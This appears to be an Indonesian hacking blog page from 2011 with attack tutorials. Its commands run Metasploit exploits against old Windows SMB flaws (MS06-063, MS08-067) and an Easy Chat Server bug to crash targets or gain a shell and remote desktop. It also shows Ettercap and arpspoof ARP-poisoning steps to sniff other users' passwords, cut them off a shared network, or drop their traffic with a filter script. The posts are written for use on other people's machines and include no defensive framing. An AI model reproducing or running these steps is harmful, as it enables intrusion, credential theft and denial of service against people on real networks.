Ads 468x60px

Sabtu, 19 November 2011

dos dengan metasploit

Denial Of Service atau biasa disingkat dengan DOS adalah sebuah serangan yang dilakukan untuk melumpuhkan sebuah sistem atau jaringan untuk maksud-maksud tertentu dengan jalan mengirimkan paket dalam jumlah yang sangat banyak, sehingga Sistem atau Jaringan yang menerima paket-paket tersebut manjadi crash.
Berikut adalah serangan DOS menggunakan kelemahan yang terdapat pada SVR.SYS yang betugas sebagai driver sistem operasi windows.

Berikut daftar Sistem Operasi Windows memilik kelemahan pada SVR.SYS :

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Profesional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Emas 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Versi 2003 SP1
Microsoft Windows XP 64-bit Edition 2003 Versi
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 SP4 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

Serangan :

1. Jalankan metasploit.

root@bt:~# msfconsole

2. Cek target pada Port 445.

root@bt:~# nmap 10.5.4.108

3. Jalankan Perintah untuk melakukan serangan.

use dos/windows/smb/ms06_063_trans
set LPORT 445
set RHOST IP_TARGET
run

4. Jika Serangan berhasil dilakukan maka komputer target akan mengalami Blue Screen Of Death.











Exploit Windows

Exploit ada sebuah kode yang digunakan untuk dapat menyerang sebuah Sistem Keamanan Komputer. Exploit banyak digunakan orang-orang yang memang bekerja untuk mencari kelemahan(Vulnerability) pada sebuah Komputer atau Perangkat Lunak. Berikut adalah contoh dari serangan menggunakan Exploit.

Serangan :

1. Cek port target pada port 445.
nmap ip-target]












2. Jalankan Metasploit.
msfconsole













3. Jalankan Perintah untuk Melakukan Serangan.
nmap ip-target
use windows/smb/ms08_067_netapi (enter)
set payload windows/meterpreter/bind_tcp (enter)
set lhost ip-kita
set rhost ip-target
exploit













4. Jika serangan berhasil maka kita akan mendapatkan akses kepada sistem target.
execute -f cmd.exe -c -i













Remote desktop

Sebelumnya sahabat bisa melihat bagaimana mudahnya kita mendapatkan akses kepada sebuah komputer dengan hanya dengan melakukan Exploitasi Sistem Operasi Windows. Dan saat ini kita akan melakukan serangan untuk dapat melakukan remote desktop kepada sistem Operasi Windows.

Serangan :

1. Jalankan Metasploit.
msfconsole

2. Jalankan perintah untuk serangan.


use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/vncinject/bind_tcp
set RHOST IP_TARGET
exploit

3. Jika Serangan berhasil maka akan keluar desktop dari komputer target.












Snifing Dengan Etercap

Pertama buka Ettercap dan jalankan dalam mode root.













Sniffer > Unified Sniffing

Pilih kartu jaringan yang ingin anda pilihk kemudian klik "OK".

Hosts > Scan for Hosts
Di bagian bawah layar sebagai "Hosts List adalah host yang ditambahkan" (Mereka yang tercantum di bawah ini adalah komputer yang sedang online dalam jaringan).
















Hosts > Host list

Sekarang mucul IP dari pada komputer yang terhubung,harus diingat bahwa router juga ikut muncul.

Pilih IP komputer Anda untuk menyerang dan klik "Add to Target 1", maka router pada "Add to Target 2"















Sebelum Anda mulai melakukan sniffer,mari kita ingat dan gunakan teknik yang disebut man-in-the-Midler.

MITM > ARP Poisoning - Sekarang check list pada "Sniff remote connections" dan klik "OK"















Start > Start sniffing.















kita telah melakukan sniffing.

View > Connections - Di sini kita dapat melihat semua koneksi,klik double untuk dapat melihat data yang dikandungnya, termasuk percakapan, pengguna dan password, dll.

Sekarang tinggalkan biarkan Ettercap bekerja.

arp-spoofing-untuk-mengganti-tuxcut


Jika kalian menggunakan koneksi local yang dishare,dan pengguna lain menggunakan bandwith yang berlebihan kemudian membuat koneksi internet agan menjadi lambat.
kalau agan pake windows mungkin bisa pake NetCut,dan kalau agan pake linux bisa pake TuxCut,tapi seandainya agan ngak punya tu aplikasi,ato error waktu install,mungkin ARP Spoofing bisa jadi penggantinya.3:)

install paket arpspoof
sudo apt-get install dsniff

1. Membuat komputer target terputus dengan komputer lain
sudo arpspoof -i [kartu jaringan yang digunakan] -t [ip_address] [ip target]

perintah diatas akan membuat komputer dengan IP address 192.168.1.1 terputus dengan komputer IP address 192.168.1.2,dan membuat tidak dapat melakukan ping kepada komputer 192.168.1.2 dan sebaliknya.'Wlan0' adalah kartu jaringan yang digunakan untuk melakukan arp poisoning.untuk melihat kartu jaringan yang digunakan ketik perintah ifconfig.

2. Membuat komputer target terputus dengan semua komputer
sudo arpspoof -i wlan0 [ip target]

jika kita menjalankan arp poisoning kedalam gateway IP address,maka kita akan memiliki semua bandwith yang ada dijaringan,untuk menghentikan cukup tekan ctrl + c.;*)

Denial Of Services dengan Ettercap

Sekarang Saya akan Memberikan cara melakukan DOS menggunakan Ettercap, tanpa basa-basi kita landsung meluncur keTKP.

1. Buka Gedit (atau file editor apapun) kemudian tulis perintah copas perintah dibawah ini.


if(ip.src == 'IP_TARGET' || ip.dst == 'IP_TARGET') {
drop();
kill();
msg("Gilakomputer mencoba menyerang !!\n");
}

ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft
2. Convert file dos.eft menjadi dos.ef

etterfilter dos.eft -o dos.ef

3. Lakukan serangan

ettercap -T -q -F /root/dos.ef -M ARP /IP_TARGET/ // -i kartu_jaringan

Jika Sikorban mengakses Internet maka akan muncul tampilan seperti ini.
Dan ini adalah hasil dari kelakuan kalian















Windows XP


















Windows 7 yang juga ikut KO


















Jumat, 18 November 2011

Exploit Easy Chat Server v2.2

Tehnik ini bisa dipakai untuk windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.
Langsung saja bigini caranya
1. Buka Metasploit
msfconsole


2. Jalankan Proses Explotasi.
muse exploit/windows/http/efs_easychatserver_username
set payload windows/shell/bind_tcp
set rhost IP_Target
exploit



Highslide JS

Highslide JS


































Selamat mencoba